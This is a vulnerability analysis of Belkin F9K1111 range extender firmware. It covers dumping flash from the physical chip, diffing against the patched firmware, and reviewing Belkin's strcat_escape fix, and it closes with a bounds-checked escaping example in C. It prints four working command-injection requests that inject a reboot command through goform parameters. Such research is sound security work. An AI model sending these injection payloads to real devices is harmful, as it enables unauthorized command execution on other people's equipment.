Belkin F9K1111 firmware Vulnerability Analysis
Recently we noticed that HP DVLabs had found at least 10 vulnerabilities in the Belkin N300 dual-band WiFi range extender (F9K1111). In response, Belkin released firmware version 1.04.10. Because this is the first update ever released for the F9K1111, and there is no public trigger method for these vulnerabilities, it is interesting and worthwhile to study it in depth.
0x01 Unpack the update file
Before starting the analysis, we first download the firmware update from the vendor's website [1], then unpack the update file with the firmware tool binwalk [2]:
$ binwalk -Me F9K1111_WW_1.04.10_upg.bin
The following figure shows the result. It looks like a fairly standard SquashFS file system, representing the root directory of the device.
Now, in order to run BinDiff, we need to interact with the hardware to obtain the unpatched version of the files.
0x02 Obtain the base firmware
To analyze the base firmware, we need some way to dump it from the physical device. To do this, we must first open the device's case.
The red and blue boxes mark the candidate locations for retrieving the firmware: an SPI flash chip and a UART interface. Although we saw some activity on the UART, we continued with the base image on the SPI flash chip. The pinout of the chip we are working with, an MX25L1606E, is available from Macronix.
After obtaining the pinout and removing the chip, we are ready to connect a GoodFET [3] to the standard 8-pin package shown above.
After bridging pins 7 and 8, we use the following command to make sure all the connections are correct:
$ python goodfet.spiflash info
Next, run goodfet.spiflash dump to obtain the contents of the chip:
$ python goodfet.spiflash dump s
Finally, we run a quick strings search over the resulting file to make sure the dump looks valid (at least contains some readable strings).
As before, the binary can be unpacked with binwalk.
0x03 Diffing the update
We move the two unpacked file systems to a Windows box and drag them into WinMerge [4]. We can see that there is not much change.
The files compiler_data, version, and FUNCTION_SCRIPT contain no interesting changes (apart from data that may be useful for fingerprinting), and there is little of interest in util_system.asp. Therefore we spend most of our effort on Belkin's modifications to webs, the GoAhead web server.
0x04 Analysis of webs
HP's Zero Day Initiative named these vulnerabilities after the potentially affected function or input, as follows:
1. formWpsStart pinCode Remote Code Execution Vulnerability
2. formWlanSetupWPS wps_enrolee_pin Remote Code Execution Vulnerability
3. formWlanMP Remote Code Execution Vulnerability
4. formBSSetSitesurvey Remote Code Execution Vulnerability
5. formHwSet Remote Code Execution Vulnerability
6. formConnectionSetting Remote Code Execution Vulnerability
7. formAccept Remote Code Execution Vulnerability
8. formiNICWpsStart Remote Code Execution Vulnerability
9. formUSBStorage Remote Code Execution Vulnerability
So, after loading the patched webs into IDA, we search the function list for formHwSet. Nothing is found. In fact, many of these functions are missing. Dragging it into BinDiff, we can see that seven functions were removed in the update, as shown in the following table.
These correspond well to the ZDI report. In fact, every function listed in the ZDI report has been deleted, except formWlanSetupWPS and formBSSetSitesurvey. Next, we take some time to look at the deleted functions in detail.
0x05 formUsbStorage
We analyze the formUsbStorage function first. After a quick read of this function it is obvious that there are problems. First, the GoAhead webs API function websGetVar is used to fetch the POST variable sub_dir, and then this variable is passed into a system() call. Command injection is possible here.
This code can be triggered by the following command:
wget --post-data="sub_dir=vectra; reboot" http://belkin.range/goform/formUSBStorage
0x06 formWlanMP
Similar errors can be found in formWlanMP. By tracing the websGetVar calls, we can see several candidate vulnerabilities.
Following them further, we find that these candidates are used as input to system() calls. Here we analyze ateFunc.
This code can be triggered by the following command:
wget --post-data="ateFunc=; reboot;" http://belkin.range/goform/formWlanMP
0x07 formHwSet
More command injection vulnerabilities exist here. This time we use the variable Anntena [sic].
This code can be triggered by the following command:
wget --post-data="Anntena=; reboot;" http://belkin.range/goform/formHwSet
0x08 formConnectionSetting
Here we found a command injection vulnerability in the timeOut parameter of the formConnectionSetting function.
This code can be triggered by the following command:
wget --post-data="timeOut=1; reboot;" http://belkin.range/goform/formConnectionSetting
0x09 formBSSetSitesurvey
Now that we have looked at the deleted functions, let's turn to the more important one: formBSSetSitesurvey, which Belkin did not delete. Here is its overall structure:
Zooming in, we find that the biggest change is that Belkin added a strcat_escape function and used it throughout formBSSetSitesurvey.
This strcat_escape function takes three buffers: dst, src, and tokens. Any character of src that appears in tokens is escaped before being copied to dst; the function searches src for the tokens using nested loops. As shown in the figure, token_of_none_quotation is passed as the token list, and it is defined as "\" '$ ()' # & * | ;". Using the webs binary we can re-implement this function in C, and then we can see the expected output:
The (presumably correctly) escaped string is then passed to system() through sprintf.
The effectiveness of this patch depends on several factors:
1. strcat_escape works exactly as expected
2. strcat_escape does not inadvertently introduce a buffer overflow
3. strcat_escape is applied to all user input that ends up in system()
0x0A Conclusion
We all know that the security maturity of embedded device code is still a problem. In this article we have seen that even a device released in 2014 still has this problem.
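The second condition above, that escaping must not itself overflow the destination, is easy to get wrong because every escaped byte grows the output by one. The following is an added example, not the webs implementation and not code from the original post: a bounds-checked escape with a hypothetical signature (strcat_escape_safe, with an explicit dst_size) and a constructed token set that approximates, but is not copied from, token_of_none_quotation.

```c
#include <stdio.h>
#include <string.h>

/* Constructed token set for this example: shell metacharacters that are
 * dangerous when the value is interpolated unquoted. It approximates, but
 * is not copied from, the page's token_of_none_quotation. */
static const char *TOKENS = "\"'$()#&*|;";

/* Length src will occupy once every token byte is prefixed with a backslash.
 * The worst case is 2 * strlen(src), which is what dst must be sized for. */
size_t escaped_len(const char *src, const char *tokens)
{
    size_t n = 0;
    for (const char *p = src; *p != '\0'; p++)
        n += strchr(tokens, *p) ? 2 : 1;
    return n;
}

/* Bounds-checked escape-and-append (hypothetical signature, not the one in
 * webs). dst_size is the full capacity of dst including the terminating NUL.
 * Returns the number of bytes appended, or -1 and leaves dst untouched if
 * the escaped result would not fit. */
long strcat_escape_safe(char *dst, size_t dst_size,
                        const char *src, const char *tokens)
{
    size_t used = strlen(dst);
    size_t need = escaped_len(src, tokens);
    if (used + need + 1 > dst_size)
        return -1;                          /* refuse rather than overflow */
    char *out = dst + used;
    for (const char *p = src; *p != '\0'; p++) {
        if (strchr(tokens, *p))
            *out++ = '\\';
        *out++ = *p;
    }
    *out = '\0';
    return (long)need;
}

int main(void)
{
    char cmd[32] = "ls ";
    /* Constructed input that would end the command early if unescaped. */
    if (strcat_escape_safe(cmd, sizeof cmd, "a;b", TOKENS) < 0)
        return 1;
    printf("%s\n", cmd);                    /* ls a\;b */
    char small[8] = "";
    /* Four token bytes need eight bytes plus NUL: refused, buffer unchanged. */
    printf("%ld\n", strcat_escape_safe(small, sizeof small, ";;;;", TOKENS));
    return 0;
}
```

Note that a space is not in this token set, so an escaped value can still be split into several arguments by the shell; whether that matters depends on how the sprintf format string quotes it, which is part of condition 1 rather than condition 2.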